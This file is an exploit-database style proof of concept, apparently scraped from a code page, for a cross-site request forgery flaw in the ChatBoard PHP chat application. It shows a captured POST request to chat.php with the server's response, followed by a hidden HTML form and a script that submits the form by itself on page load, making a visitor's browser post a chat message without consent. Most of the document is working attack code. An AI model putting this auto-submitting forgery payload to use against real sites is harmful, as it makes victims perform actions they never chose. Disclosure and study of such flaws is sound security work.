49 lines
No EOL
1.7 KiB
HTML
49 lines
No EOL
1.7 KiB
HTML
<!--
|
|
# Exploit Title: Ultrabenosaurus ChatBoard - CSRF(Send Message)
|
|
# Date: 2016-06-14
|
|
# Exploit Author: HaHwul
|
|
# Exploit Author Blog: www.hahwul.com
|
|
# Vendor Homepage: http://ultrabenosaurus.ninja/
|
|
# Software Link: https://github.com/Ultrabenosaurus/ChatBoard/archive/master.zip
|
|
# Tested on: Debian [wheezy]
|
|
|
|
### Vulnerability Code
|
|
-----------------------------------------------------------------------------------------
|
|
POST /vul_test/ChatBoard/__original/chat.php HTTP/1.1
|
|
Host: 127.0.0.1
|
|
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
|
|
Accept: */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
X-Requested-With: XMLHttpRequest
|
|
Referer: http://CSRF_NO_REFERE_CHECK
|
|
Content-Length: 8
|
|
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5
|
|
Connection: keep-alive
|
|
|
|
msg=CSRF
|
|
### Response
|
|
-----------------------------------------------------------------------------------------
|
|
HTTP/1.1 200 OK
|
|
Date: Tue, 14 Jun 2016 01:52:02 GMT
|
|
Server: Apache/2.4.10 (Ubuntu)
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
|
Pragma: no-cache
|
|
Content-Length: 7
|
|
Keep-Alive: timeout=5, max=100
|
|
Connection: Keep-Alive
|
|
Content-Type: text/html; charset=UTF-8
|
|
|
|
written
|
|
-----------------------------------------------------------------------------------------
|
|
|
|
### Vulnerability Code
|
|
-->
|
|
|
|
<form name="csrf_poc" action="http://127.0.0.1/vul_test/ChatBoard/__original/chat.php" method="POST">
|
|
<input type="hidden" name="msg" value="CSRF">
|
|
<input type="submit" value="CSRF Attack">
|
|
</form>
|
|
<script type="text/javascript">document.forms.csrf_poc.submit();</script> |